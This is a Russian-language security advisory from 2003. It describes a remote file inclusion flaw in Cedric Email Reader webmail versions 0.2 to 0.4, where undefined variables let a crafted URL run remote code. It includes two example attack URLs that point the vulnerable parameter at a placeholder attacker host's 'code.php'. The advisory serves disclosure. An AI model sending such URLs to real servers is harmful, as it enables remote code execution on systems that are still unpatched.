Выполнение произвольного кода в Cedric Email Reader

Дата публикации:
13.02.2003
Всего просмотров:
854
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Cedric email reader
Описание: Уязвимость включения файла обнаружена в программе Cedric Email Reader webmail. Удаленный атакующий может выполнять произвольный код на уязвимом сервере.

Файл 'email.php3' (в версии 0.2) или 'email.php' (в версии 0.3) включают '$cer_skin' переменную, но предварительно ее не определяют. В результате удаленный атакующий может создать специально сформированный URL, в котором переменная '$cer_skin' ссылается на удаленно расположенный файл. Этот файл будет выполнен на Web сервере с привилегиями Web сервера. Пример:

http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php
Также в версии 0.4 уязвим сценарий 'webmail/lib/emailreader_execute_on_each_page.inc.php', включающий переменную '$emailreader_ini'. Пример:
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php

Уязвимость обнаружена в Cedric Email Reader 0.2, 0.3, 0.4

Ссылки: Cedric Email Reader (PHP)
или введите имя

CAPTCHA